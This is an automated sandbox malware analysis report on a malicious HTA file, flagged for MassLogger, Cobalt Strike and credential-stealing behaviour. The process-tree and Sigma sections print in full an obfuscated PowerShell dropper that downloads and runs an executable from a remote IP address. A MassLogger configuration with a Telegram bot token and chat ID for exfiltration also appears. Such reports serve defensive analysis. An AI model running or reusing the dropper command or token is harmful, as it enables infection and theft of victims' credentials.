Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
wecreatebestthingsentirelifeforgivenyou.hta

Overview

General Information

Sample name:wecreatebestthingsentirelifeforgivenyou.hta
Analysis ID:1636644
MD5:7c7b7736fd7286e02a2d2b8fa534c43b
SHA1:ba864f100c8ff38d4ca4b344050760863a33a24d
SHA256:4ad94e45fdf797bcd666aa0de12c32a3f59d46103b7053d8fb94428a59478481
Tags:htauser-abuse_ch
Infos:

Detection

Cobalt Strike, MSIL Logger, MassLogger RAT
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected Cobalt Strike Beacon
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Powershell decode and execute
Yara detected Telegram RAT
.NET source code references suspicious native API functions
Binary is likely a compiled AutoIt script file
Contains functionality to log keystrokes (.Net Source)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious MSHTA Child Process
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 6604 cmdline: mshta.exe "C:\Users\user\Desktop\wecreatebestthingsentirelifeforgivenyou.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 3712 cmdline: "C:\Windows\system32\cmd.exe" "/C poWErSheLL -Ex ByPass -NoP -w 1 -C DeViCECReDENtialdEplOyment ; iEx($(IEX('[SyStEM.teXt.encODiNG]'+[ChaR]58+[cHAR]0X3A+'Utf8.gETsTriNG([SYStEM.CoNvErt]'+[CHaR]0X3a+[chAR]58+'FROMbASE64STring('+[ChAR]34+'JG1xZ0doICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlZkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlFtV1RvTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVXlILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENZYlJFKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYeFBHb1lmdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbXFnR2g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjIzMS4yMTEvMzExL2Nzc29zLmV4ZSIsIiRFTnY6QVBQREFUQVxjb3NzZS5leGUiLDAsMCk7c1RhcnQtc0xlZVAoMyk7aU52b2tlLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxjb3NzZS5leGUi'+[chAR]34+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5004 cmdline: poWErSheLL -Ex ByPass -NoP -w 1 -C DeViCECReDENtialdEplOyment ; iEx($(IEX('[SyStEM.teXt.encODiNG]'+[ChaR]58+[cHAR]0X3A+'Utf8.gETsTriNG([SYStEM.CoNvErt]'+[CHaR]0X3a+[chAR]58+'FROMbASE64STring('+[ChAR]34+'JG1xZ0doICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlZkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlFtV1RvTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVXlILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENZYlJFKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYeFBHb1lmdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbXFnR2g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjIzMS4yMTEvMzExL2Nzc29zLmV4ZSIsIiRFTnY6QVBQREFUQVxjb3NzZS5leGUiLDAsMCk7c1RhcnQtc0xlZVAoMyk7aU52b2tlLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxjb3NzZS5leGUi'+[chAR]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 1644 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qrkmxxq1\qrkmxxq1.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 2812 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9E10.tmp" "c:\Users\user\AppData\Local\Temp\qrkmxxq1\CSCA5EBD89D883B423C8D6CB33CF6463C44.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • cosse.exe (PID: 920 cmdline: "C:\Users\user\AppData\Roaming\cosse.exe" MD5: 709A4FFEC76D0C7715CB6A69A3610EDE)
          • RegSvcs.exe (PID: 6960 cmdline: "C:\Users\user\AppData\Roaming\cosse.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • svchost.exe (PID: 6012 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7996508565:AAHHBM6wSJS6GosO-ff2t38cxPw1t-vbBj8", "Telegram Chatid": "5758197122"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.969302157.00000000033B0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000006.00000002.969302157.00000000033B0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000006.00000002.969302157.00000000033B0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
        00000006.00000002.969302157.00000000033B0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000006.00000002.969302157.00000000033B0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0xf1df:$a1: get_encryptedPassword
          • 0xf507:$a2: get_encryptedUsername
          • 0xef7a:$a3: get_timePasswordChanged
          • 0xf09b:$a4: get_passwordField
          • 0xf1f5:$a5: set_encryptedPassword
          • 0x10b51:$a7: get_logins
          • 0x10802:$a8: GetOutlookPasswords
          • 0x105f4:$a9: StartKeylogger
          • 0x10aa1:$a10: KeyLoggerEventArgs
          • 0x10651:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 17 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          7.2.RegSvcs.exe.400000.0.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            7.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              7.2.RegSvcs.exe.400000.0.unpackJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
                7.2.RegSvcs.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  7.2.RegSvcs.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0xf1df:$a1: get_encryptedPassword
                  • 0xf507:$a2: get_encryptedUsername
                  • 0xef7a:$a3: get_timePasswordChanged
                  • 0xf09b:$a4: get_passwordField
                  • 0xf1f5:$a5: set_encryptedPassword
                  • 0x10b51:$a7: get_logins
                  • 0x10802:$a8: GetOutlookPasswords
                  • 0x105f4:$a9: StartKeylogger
                  • 0x10aa1:$a10: KeyLoggerEventArgs
                  • 0x10651:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 13 entries

                  Other

                  SourceRuleDescriptionAuthorStrings
                  amsi32_5004.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Suspicious MSHTA Child Process
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C poWErSheLL -Ex ByPass -NoP -w 1 -C DeViCECReDENtialdEplOyment ; iEx($(IEX('[SyStEM.teXt.encODiNG]'+[ChaR]58+[cHAR]0X3A+'Utf8.gETsTriNG([SYStEM.CoNvErt]'+[CHaR]0X3a+[chAR]58+'FROMbASE64STring('+[ChAR]34+'JG1xZ0doICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlZkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlFtV1RvTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVXlILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENZYlJFKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYeFBHb1lmdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbXFnR2g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjIzMS4yMTEvMzExL2Nzc29zLmV4ZSIsIiRFTnY6QVBQREFUQVxjb3NzZS5leGUiLDAsMCk7c1RhcnQtc0xlZVAoMyk7aU52b2tlLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxjb3NzZS5leGUi'+[chAR]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C poWErSheLL -Ex ByPass -NoP -w 1 -C DeViCECReDENtialdEplOyment ; iEx($(IEX('[SyStEM.teXt.encODiNG]'+[ChaR]58+[cHAR]0X3A+'Utf8.gETsTriNG([SYStEM.CoNvErt]'+[CHaR]0X3a+[chAR]58+'FROMbASE64STring('+[ChAR]34+'JG1xZ0doICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlZkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlFtV1RvTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVXlILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENZYlJFKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYeFBHb1lmdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRWkgICAgICAgICAgICAgICAgI
                    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qrkmxxq1\qrkmxxq1.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qrkmxxq1\qrkmxxq1.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: poWErSheLL -Ex ByPass -NoP -w 1 -C DeViCECReDENtialdEplOyment ; iEx($(IEX('[SyStEM.teXt.encODiNG]'+[ChaR]58+[cHAR]0X3A+'Utf8.gETsTriNG([SYStEM.CoNvErt]'+[CHaR]0X3a+[chAR]58+'FROMbASE64STring('+[ChAR]34+'JG1xZ0doICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlZkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlFtV1RvTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVXlILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENZYlJFKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYeFBHb1lmdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbXFnR2g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjIzMS4yMTEvMzExL2Nzc29zLmV4ZSIsIiRFTnY6QVBQREFUQVxjb3NzZS5leGUiLDAsMCk7c1RhcnQtc0xlZVAoMyk7aU52b2tlLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxjb3NzZS5leGUi'+[chAR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5004, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qrkmxxq1\qrkmxxq1.cmdline", ProcessId: 1644, ProcessName: csc.exe
                    Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5004, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\cssos[1].exe
                    Sigma detected: Dynamic CSharp Compile Artefact
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5004, TargetFilename: C:\Users\user\AppData\Local\Temp\qrkmxxq1\qrkmxxq1.cmdline
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: poWErSheLL -Ex ByPass -NoP -w 1 -C DeViCECReDENtialdEplOyment ; iEx($(IEX('[SyStEM.teXt.encODiNG]'+[ChaR]58+[cHAR]0X3A+'Utf8.gETsTriNG([SYStEM.CoNvErt]'+[CHaR]0X3a+[chAR]58+'FROMbASE64STring('+[ChAR]34+'JG1xZ0doICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlZkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlFtV1RvTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVXlILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENZYlJFKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYeFBHb1lmdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbXFnR2g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjIzMS4yMTEvMzExL2Nzc29zLmV4ZSIsIiRFTnY6QVBQREFUQVxjb3NzZS5leGUiLDAsMCk7c1RhcnQtc0xlZVAoMyk7aU52b2tlLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxjb3NzZS5leGUi'+[chAR]34+'))')))", CommandLine: poWErSheLL -Ex ByPass -NoP -w 1 -C DeViCECReDENtialdEplOyment ; iEx($(IEX('[SyStEM.teXt.encODiNG]'+[ChaR]58+[cHAR]0X3A+'Utf8.gETsTriNG([SYStEM.CoNvErt]'+[CHaR]0X3a+[chAR]58+'FROMbASE64STring('+[ChAR]34+'JG1xZ0doICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlZkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlFtV1RvTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVXlILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENZYlJFKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYeFBHb1lmdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICA
                    Sigma detected: Windows Processes Suspicious Parent Directory
                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 616, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6012, ProcessName: svchost.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Dot net compiler compiles file from suspicious location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qrkmxxq1\qrkmxxq1.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qrkmxxq1\qrkmxxq1.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: poWErSheLL -Ex ByPass -NoP -w 1 -C DeViCECReDENtialdEplOyment ; iEx($(IEX('[SyStEM.teXt.encODiNG]'+[ChaR]58+[cHAR]0X3A+'Utf8.gETsTriNG([SYStEM.CoNvErt]'+[CHaR]0X3a+[chAR]58+'FROMbASE64STring('+[ChAR]34+'JG1xZ0doICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlZkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlFtV1RvTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVXlILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENZYlJFKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYeFBHb1lmdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbXFnR2g6OlVSTERvd25sb2FkVG9Ga